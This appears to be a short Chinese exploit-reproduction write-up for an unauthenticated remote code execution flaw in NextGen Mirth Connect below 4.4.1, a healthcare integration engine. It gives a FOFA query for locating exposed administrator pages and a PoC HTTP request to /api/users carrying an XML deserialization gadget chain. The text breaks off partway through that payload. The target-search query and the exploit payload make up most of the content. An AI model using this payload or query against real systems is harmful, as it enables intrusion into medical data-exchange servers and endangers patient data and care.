0x01 产品简介
NextGen Mirth Connect是是美国NextGen公司的一个医疗集成引擎,主要用于医疗领域的系统集成和数据交换,支持多种协议和标准。
0x02 漏洞概述
NextGen Mirth Connect 4.4.1之前版本存在远程代码执行漏洞,未经身份认证的攻击者可利用该漏洞远程执行代码。
0x03 影响范围
NextGen NextGen Mirth Connect < 4.4.1
0x04 复现环境
FOFA:title="Mirth Connect Administrator"
0x05 漏洞复现
PoC
POST /api/users HTTP/1.1
Host: your-ip
X-Requested-With: OpenAPI
Content-Type: application/xml<sorted-set><string>abcd</string><dynamic-proxy><interface>java.lang.Comparable</interface><handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler"><target class="org.apache.commons.collections4.functors.Chai
